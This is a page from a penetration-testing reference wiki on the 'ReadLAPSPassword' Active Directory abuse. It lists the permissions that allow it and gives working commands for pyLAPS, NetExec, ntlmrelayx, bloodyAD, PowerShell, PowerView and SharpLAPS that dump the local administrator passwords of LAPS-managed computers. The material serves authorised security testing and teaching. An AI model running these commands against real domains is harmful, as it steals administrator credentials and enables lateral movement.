ReadLAPSPassword

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).

From UNIX-like systems, pyLAPS (Python) can be used to retrieve LAPS passwords.

pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101

Alternatively, NetExec also has this ability. In case it doesn't work this public module for CrackMapExec could also be used.

# Default command
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps

# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"

Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.

LAPSDumper is another Python alternative.

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

This can be achieved with the Active Directory PowerShell module.

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

The PowerView powershell module from PowerSploit can also be used for that purpose.

Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

SharpLAPS (C#) automates that process.

SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

Resources

DirSync: Leveraging Replication Get-Changes and Get-Changes-In-Filtered-Setsimondotsh’s infosec stuff

PreviousTargeted Kerberoasting NextReadGMSAPassword

Last updated 1 month ago